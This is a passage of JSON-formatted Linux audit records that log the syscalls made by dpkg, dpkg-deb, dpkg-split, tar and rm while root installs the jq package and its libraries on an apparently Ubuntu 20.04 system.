"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.921:611",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7642,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"rm",
"-rf",
"--",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/rm",
"inode": 787363,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:612",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7642,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0x4",
"0x55c35ac84938",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:613",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7642,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0xffffff9c",
"0x55c35ac834d0",
"0x200",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:614",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.925:615",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x7ffef7ae42e0",
"0x7ffef7ae42e0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.925:616",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7643,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-split",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:617",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7643,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-split",
"exe": "/usr/bin/dpkg-split",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-split",
"-Qao",
"/var/lib/dpkg/reassemble.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-split",
"inode": 787056,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:618",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba9334b0",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x556eba297010"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.925:619",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7644,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:620",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7644,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.925:621",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffd79189420",
"0x563b8d402510",
"0x7ffd791897d0",
"0x7f43ff245740"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/tar",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.925:622",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "rootcmd",
"ARGV": [
"0x7ffd79189420",
"0x563b8d402510",
"0x7ffd791897d0",
"0x7f43ff245740"
]
},
"EXECVE": {
"argc": 5,
"ARGV": [
"tar",
"-x",
"-f",
"-",
"--warning=no-timestamp"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/tar",
"inode": 787546,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.933:623",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.933:624",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.933:625",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277185,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.933:626",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277185,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.933:627",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 260,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7644,
"pid": 7647,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0xffffff9c",
"0x55c8ebcd2350",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": ".",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.925,
"ppid": 7624
}
}
{
"ID": "1632470477.949:628",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0007",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
